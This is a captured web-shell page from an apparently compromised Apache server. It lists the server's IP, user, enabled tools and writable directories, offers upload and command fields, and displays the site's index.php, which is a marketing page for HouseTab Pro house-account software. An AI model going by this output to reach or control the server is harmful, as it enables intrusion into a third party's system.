403Webshell
Server IP : 173.209.174.21  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux wcfs-server 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : nodor ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/housetabpro/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/housetabpro/index.php
<?php
?>
<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HouseTab Pro | Hosted or Self-Hosted House Account Software</title>
    <meta name="description" content="HouseTab Pro helps independent retailers replace paper house accounts with a simple digital system for balances, statements, credits, and account history, with hosted and self-hosted options.">
    <link rel="stylesheet" href="style.css">
    <style>
        .cards img {
            width: 100%;
            max-height: 180px;
            object-fit: cover;
            border-radius: 10px;
            box-shadow: 0 15px 35px rgba(0,0,0,.15);
            margin-bottom: 12px;
            display: block;
            transition: transform .2s ease;
        }

        .cards img:hover {
            transform: scale(1.03);
        }

        .screenshot-link {
            display: block;
        }
    </style>
</head>
<body>
<?php
$selfHostedCheckout = 'https://app.housetabpro.com/self_hosted_checkout.php?plan=self_hosted';
$selfHostedSetupCheckout = 'https://app.housetabpro.com/self_hosted_checkout.php?plan=self_hosted_setup';
?>

<header class="site-header">
    <div class="container nav">
        <div class="logo-wrap">
            <img class="logo-icon" src="images/house-tab-pro-app-icon.svg" alt="HouseTab Pro icon">
            <div>
                <div class="brand-name">HouseTab Pro</div>
                <div class="brand-tag">Digital House Accounts. Simple. Accurate.</div>
            </div>
        </div>
        <nav>
            <a href="#features">Features</a>
            <a href="#pricing">Pricing</a>
            <a href="#faq">FAQ</a>
            <a href="https://app.housetabpro.com/login.php">Login</a>
            <a href="https://app.housetabpro.com/signup.php">Buy Hosted</a>
            <a href="<?php echo $selfHostedCheckout; ?>">Buy Self-Hosted</a>
        </nav>
    </div>
</header>

<section class="hero">
    <div class="container hero-grid">
        <div>
            <p class="eyebrow">Built for independent retailers</p>
            <h1>Run HouseTab Pro your way: hosted or self-hosted.</h1>
            <p class="hero-text">
                HouseTab Pro helps local stores track balances, print statements, manage credits,
                and keep cleaner account history with a practical workflow built around real house accounts.
            </p>
            <p class="hero-text">
                Start with hosted access for $29/month with a 7-day free trial, or choose a $599 one-time
                self-hosted license. Need help getting self-hosted live? Optional remote setup is $299 one-time.
            </p>

            <div class="hero-buttons">
                <a href="https://app.housetabpro.com/login.php" class="btn btn-outline">Login</a>
                <a href="https://app.housetabpro.com/signup.php" class="btn">Buy Hosted</a>
                <a href="<?php echo $selfHostedCheckout; ?>" class="btn btn-secondary">Buy Self-Hosted</a>
                <a href="https://app.housetabpro.com/signup.php" class="btn btn-outline">Start Free Trial</a>
            </div>

            <div class="hero-points">
                <span>Hosted or self-hosted</span>
                <span>7-day free trial</span>
                <span>Designed for real store workflow</span>
            </div>
            <p class="hero-text" style="margin-top:18px;font-size:0.98rem;">
                Ready for hosted? <a href="https://app.housetabpro.com/signup.php" style="color:#1d4ed8;font-weight:700;">Buy hosted or start the free trial</a>.
                Ready for self-hosted? <a href="<?php echo $selfHostedCheckout; ?>" style="color:#1d4ed8;font-weight:700;">Purchase the self-hosted license</a>.
                Already have an account? <a href="https://app.housetabpro.com/login.php" style="color:#1d4ed8;font-weight:700;">Log in here</a>.
            </p>
        </div>

        <div class="hero-card">
            <h3>Choose the setup that fits your store</h3>
            <ul>
                <li><strong>Hosted:</strong> We host it, you start fast</li>
                <li><strong>Self-hosted:</strong> You run it on your own server</li>
                <li><strong>Remote setup:</strong> Optional one-time install help</li>
                <li>Same core workflow for tabs, credits, and statements</li>
                <li>Built for practical small-store use, without oversized software</li>
            </ul>
        </div>
    </div>
</section>

<section class="section light">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">A practical system</p>
            <h2>Made for stores that need something straightforward</h2>
            <p>
                HouseTab Pro is built for independent retailers who want a cleaner way to manage charge accounts
                without jumping into bloated software or forcing every store into the same hosting model.
            </p>
        </div>

        <div class="cards three">
            <div class="card">
                <h3>Replace paper tabs</h3>
                <p>Stop relying on handwritten charge books, side notes, and manual balance tracking.</p>
            </div>
            <div class="card">
                <h3>Clean up monthly billing</h3>
                <p>Keep account history organized and generate statements without rebuilding totals by hand.</p>
            </div>
            <div class="card">
                <h3>Choose your deployment</h3>
                <p>Go hosted for simplicity or self-hosted if you want to run HouseTab Pro on your own server.</p>
            </div>
        </div>
    </div>
</section>

<section class="section light" id="explainer">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">Why HouseTab Pro</p>
            <h2>Built for stores that still run real house accounts.</h2>
            <p>
                HouseTab Pro was developed for real-world store use. Instead of relying on notebooks,
                handwritten tabs, or messy spreadsheets, stores can move to a cleaner digital system
                that stays practical day to day.
            </p>
        </div>

        <div class="cards three">
            <div class="card">
                <h3>Hosted if you want less overhead</h3>
                <p>Choose hosted when you want the simplest path to get started and keep using the software.</p>
            </div>
            <div class="card">
                <h3>Self-hosted if you want control</h3>
                <p>Choose the one-time self-hosted license if your business prefers running the software on its own systems.</p>
            </div>
            <div class="card">
                <h3>Setup help if you need it</h3>
                <p>Add optional remote setup if you want a smoother self-hosted launch without handling every step yourself.</p>
            </div>
        </div>
    </div>
</section>

<section class="section" id="features">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">Features</p>
            <h2>Focused on the things stores actually use</h2>
        </div>

        <div class="cards three">
            <div class="card">
                <h3>Customer account tracking</h3>
                <p>See totals, history, notes, and account details more easily.</p>
            </div>
            <div class="card">
                <h3>Monthly statements</h3>
                <p>Prepare printable customer statements with less month-end work.</p>
            </div>
            <div class="card">
                <h3>Credit tracking</h3>
                <p>Apply and monitor credits without relying on scribbled notes or side lists.</p>
            </div>
            <div class="card">
                <h3>Archived history</h3>
                <p>Keep older activity available without cluttering the current working view.</p>
            </div>
            <div class="card">
                <h3>Tax-aware workflow</h3>
                <p>Better visibility into taxable and non-taxable items inside the account flow.</p>
            </div>
            <div class="card">
                <h3>QuickBooks-friendly export</h3>
                <p>Move account data into accounting workflows more cleanly.</p>
            </div>
        </div>
    </div>
</section>

<section class="section light" id="how-it-works">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">How it works</p>
            <h2>A simple workflow from daily use to monthly billing</h2>
        </div>

        <div class="cards three">
            <div class="card">
                <h3>1. Add transactions</h3>
                <p>Enter purchases to the customer's account as they happen.</p>
            </div>
            <div class="card">
                <h3>2. Track balances and credits</h3>
                <p>See what each customer owes and keep adjustments organized.</p>
            </div>
            <div class="card">
                <h3>3. Generate statements</h3>
                <p>Print statements and keep cleaner records at the end of the month.</p>
            </div>
        </div>
    </div>
</section>

<section class="section" id="screenshots">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">Screenshots</p>
            <h2>See the system in action</h2>
            <p>Click any screenshot to view it larger.</p>
        </div>

        <div class="cards three">
            <div class="card">
                <a class="screenshot-link" href="images/Main dashboard.png" target="_blank">
                    <img src="images/Main dashboard.png" alt="HouseTab Pro dashboard">
                </a>
                <h3>Dashboard View</h3>
                <p>Quick access to customers, tools, statements, and reports.</p>
            </div>

            <div class="card">
                <a class="screenshot-link" href="images/customer page.png" target="_blank">
                    <img src="images/customer page.png" alt="Customer account view">
                </a>
                <h3>Customer Account View</h3>
                <p>Track purchases, notes, taxable items, and running totals in one place.</p>
            </div>

            <div class="card">
                <a class="screenshot-link" href="images/customer totals.png" target="_blank">
                    <img src="images/customer totals.png" alt="Monthly statement view">
                </a>
                <h3>Monthly Statement View</h3>
                <p>Generate clear monthly customer summaries without manual calculations.</p>
            </div>

            <div class="card">
                <a class="screenshot-link" href="images/item stats.png" target="_blank">
                    <img src="images/item stats.png" alt="Item stats view">
                </a>
                <h3>Item Stats View</h3>
                <p>See which products are being purchased across house accounts.</p>
            </div>

            <div class="card">
                <a class="screenshot-link" href="images/daily totals.png" target="_blank">
                    <img src="images/daily totals.png" alt="Daily totals view">
                </a>
                <h3>Daily Totals</h3>
                <p>View daily totals and export reports to PDF.</p>
            </div>
        </div>
    </div>
</section>

<section class="section light" id="pricing">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">Pricing</p>
            <h2>Choose hosted simplicity or a self-hosted license</h2>
            <p>
                HouseTab Pro now offers a hybrid pricing model so stores can choose the easier hosted path
                or run it on their own system.
            </p>
        </div>

        <div class="pricing-grid">
            <div class="pricing-card featured">
                <h3>Hosted</h3>
                <div class="price">$29</div>
                <p>Per month with a 7-day free trial</p>
                <ul class="check-list">
                    <li>We host the application</li>
                    <li>Fastest way to get started</li>
                    <li>Good fit for stores that want less technical overhead</li>
                </ul>
                <div class="center">
                    <a href="https://app.housetabpro.com/signup.php" class="btn">Start Free Trial</a>
                </div>
            </div>

            <div class="pricing-card">
                <h3>Self-Hosted License</h3>
                <div class="price">$599</div>
                <p>One-time software license</p>
                <ul class="check-list">
                    <li>Run HouseTab Pro on your own server</li>
                    <li>Best for businesses that want deployment control</li>
                    <li>Same core product workflow, hosted by you</li>
                </ul>
                <div class="center">
                    <a href="<?php echo $selfHostedCheckout; ?>" class="btn">Buy Self-Hosted</a>
                </div>
            </div>

            <div class="pricing-card">
                <h3>Remote Setup</h3>
                <div class="price">$299</div>
                <p>Optional one-time setup service</p>
                <ul class="check-list">
                    <li>Installation assistance for self-hosted customers</li>
                    <li>Basic setup help</li>
                    <li>Useful if you want hands-on launch support</li>
                </ul>
                <div class="center">
                    <a href="<?php echo $selfHostedSetupCheckout; ?>" class="btn btn-secondary">Buy With Remote Setup</a>
                </div>
            </div>
        </div>

        <div class="center">
            <a href="https://app.housetabpro.com/signup.php" class="btn">Start Hosted Trial</a>
            <a href="<?php echo $selfHostedCheckout; ?>" class="btn btn-secondary">Buy Self-Hosted</a>
        </div>
    </div>
</section>

<section class="section" id="faq">
    <div class="container">
        <div class="section-heading">
            <p class="eyebrow">FAQ</p>
            <h2>Questions store owners usually ask</h2>
        </div>

        <div class="cards three">
            <div class="card">
                <h3>Is HouseTab Pro subscription software?</h3>
                <p>
                    It can be, depending on which option you choose. Hosted access is $29/month with a 7-day free trial.
                    The self-hosted license is a $599 one-time purchase.
                </p>
            </div>
            <div class="card">
                <h3>What is the difference between hosted and self-hosted?</h3>
                <p>
                    Hosted means we run HouseTab Pro for you. Self-hosted means you run it on your own server and manage the deployment environment yourself.
                </p>
            </div>
            <div class="card">
                <h3>Is remote setup included?</h3>
                <p>
                    No. Remote setup is optional and costs $299 one-time. It is mainly for self-hosted customers who want installation help.
                </p>
            </div>
            <div class="card">
                <h3>Who is the hosted plan best for?</h3>
                <p>
                    Stores that want the easiest path to launch, without dealing with server setup or self-hosting details.
                </p>
            </div>
            <div class="card">
                <h3>Who is the self-hosted license best for?</h3>
                <p>
                    Businesses that want to host the software on their own systems, or prefer controlling the server environment directly.
                </p>
            </div>
            <div class="card">
                <h3>Who is it built for?</h3>
                <p>
                    Independent retailers, farm stores, hardware stores, feed stores, and other local businesses that still manage house accounts.
                </p>
            </div>
        </div>
    </div>
</section>

<section class="section cta-section">
    <div class="container cta-box">
        <div>
            <p class="eyebrow">Ready to clean up your house account process?</p>
            <h2>Start with hosted, or buy the self-hosted license.</h2>
            <p>Choose the setup that fits your store and how you want to run HouseTab Pro.</p>
        </div>
        <div class="cta-actions">
            <a href="https://app.housetabpro.com/signup.php" class="btn">Start Free Trial</a>
            <a href="<?php echo $selfHostedCheckout; ?>" class="btn btn-secondary">Buy Self-Hosted</a>
        </div>
    </div>
</section>

<footer class="site-footer">
    <div class="container footer-flex">
        <div>
            <div class="logo-wrap">
                <img class="logo-icon" src="images/house-tab-pro-app-icon.svg" alt="HouseTab Pro icon">
                <div>
                    <strong>HouseTab Pro</strong><br>
                    Digital House Accounts. Simple. Accurate.
                </div>
            </div>
        </div>
        <div>
            <a href="https://app.housetabpro.com/signup.php">Start Free Trial</a>
            &nbsp;|&nbsp;
            <a href="https://app.housetabpro.com/login.php">Login</a>
            &nbsp;|&nbsp;
            <a href="https://app.housetabpro.com/forgot_password.php">Reset Password</a>
        </div>
    </div>
</footer>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit